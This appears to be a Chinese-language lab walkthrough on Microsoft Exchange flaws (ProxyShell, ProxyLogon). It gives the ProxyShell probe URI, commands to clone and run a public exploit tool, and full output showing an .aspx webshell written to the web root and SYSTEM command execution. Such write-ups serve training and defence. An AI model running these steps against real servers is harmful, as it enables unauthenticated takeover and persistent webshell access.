Exchange 漏洞
1. ProxyShell
ProxyShell 漏洞是exchange的一系列严重漏洞的总称,由安全研究员 Orange Tsai 于 2021 年初发现
ProxyShell 是一种预授权远程代码执行漏洞,攻击者无需知道电子邮件密码即可以 NT AUTHORITY\SYSTEM 身份访问系统
研究人员在 URI 的 Email 参数中提供邮箱地址时发现了该漏洞。这是由于代码中缺少输入验证造成的。我们可以使用以下 URI 进行验证
/autodiscover/autodiscover.json?@academy.htb/mapi/nspi?&Email=autodiscover/autodiscover.json%3f@academy.htb
2. Exchange PowerShell 后端权限提升和任意文件写入
Exchange 拥有一个专用的 PowerShell 模块,用于对环境进行配置更改。任何拥有相应权限的用户都可以使用该 PowerShell 模块执行与邮箱相关的命令。虽然功能有限,但可以使用 New-MailboxExportRequest 命令,通过 -FilePath 参数将任意 Web Shell 写入(导出)到磁盘。然而,需要注意的是,该命令不支持导出和导入 PST 格式的文件。以下博文将详细介绍如何利用 Exchange PowerShell 模块、反序列化路径、与 PowerShell 远程终结点的通信以及 PowerShell 与 Web 服务管理协议之间的交互。
下面将利用 mr-r3bot 开发的 Proxyshell-Exchange, 通过指定管理员的电子邮件地址来获取系统访问权限
git clone https://github.com/mr-r3bot/Proxyshell-Exchange
python3 proxyshell.py -u https://10.129.230.42/ -e Administrator@inlanefreight.local
ldZUhrdpFDnNqQbf96nf2v+CYWdUhrdpFII5hvcGqRT/gtbahqXahoI5uanf2jmp1mlU041pqRT/FIb32tld9wZUFLfTBjm5qd/aKSDTqQ2MyenapanNjL7aXPfa1hR+glSNDYIPa4L3BtapXdqCyTEhlfvWVIa3aRTZ
[-] Checking for Proxyshell vulnerability on Exchange Server
[+] Exchange Server is vulnerable to Proxyshell
[-] Getting LegacyDN
[+] Successfully get LegacyDN
[-] Getting User SID
[+] Successfully get User SID
[-] Generating token
[+] Token generated: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTCFBZG1pbmlzdHJhdG9yQGlubGFuZWZyZWlnaHQubG9jYWxVLVMtMS01LTIxLTEwODI2MzQ4ODYtMzUzODQzMDQ2Mi0zMDE0MTY2ODMwLTUwMEcBAAAABwAAAAxTLTEtNS0zMi01NDRFAAAAAA==
[-] Checking if token is valid or not
[+] Token is valid
PS> get_shell
127.0.0.1 - - [06/Jun/2024 10:36:04] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [06/Jun/2024 10:36:05] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [06/Jun/2024 10:36:05] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [06/Jun/2024 10:36:05] "POST /wsman HTTP/1.1" 200 -
[-] Sending email contains payload with subject id: mrpuhpskaykvbrul
[+] Sent email successfully with subject id: mrpuhpskaykvbrul
[-] Executing command: New-ManagementRoleAssignment -Role "Mailbox Import Export" -User Administrator@inlanefreight.local
127.0.0.1 - - [06/Jun/2024 10:36:06] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [06/Jun/2024 10:36:06] "POST /wsman HTTP/1.1" 200 -
OUTPUT:
Mailbox Import Export-Administrator
ERROR:[-] Executing command: Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest -Confirm:$false
127.0.0.1 - - [06/Jun/2024 10:36:06] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [06/Jun/2024 10:36:07] "POST /wsman HTTP/1.1" 200 -
OUTPUT:ERROR:[-] Executing command: New-MailboxExportRequest -Mailbox Administrator@inlanefreight.local -IncludeFolders "#Drafts#" -FilePath "\\localhost\c$\inetpub\wwwroot\aspnet_client\mrpuhpskaykvbrul.aspx" -ContentFilter "Subject -eq 'mrpuhpskaykvbrul'"
127.0.0.1 - - [06/Jun/2024 10:36:07] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [06/Jun/2024 10:36:07] "POST /wsman HTTP/1.1" 200 -
OUTPUT:
inlanefreight.local/Users/Administrator\MailboxExport
ERROR:
Shell URL: https://10.129.230.42/aspnet_client/mrpuhpskaykvbrul.aspx
Testing shell 0
Testing shell 1
Shell> whoami
nt authority\system
此外也可以用msf中的版本
3. ProxyLogon
由 Orange Tsai 发现并命名为 ProxyLogon 的 CVE-2021-26855 漏洞允许使用 Exchange 的代理架构和登录机制执行未经身份验证的命令。
以下版本的 Microsoft Exchange 存在此漏洞:
- Exchange Server 2019 < 15.02.0792.010
- Exchange Server 2019 < 15.02.0721.013
- Exchange Server 2016 < 15.01.2106.013
- Exchange Server 2013 < 15.00.1497.012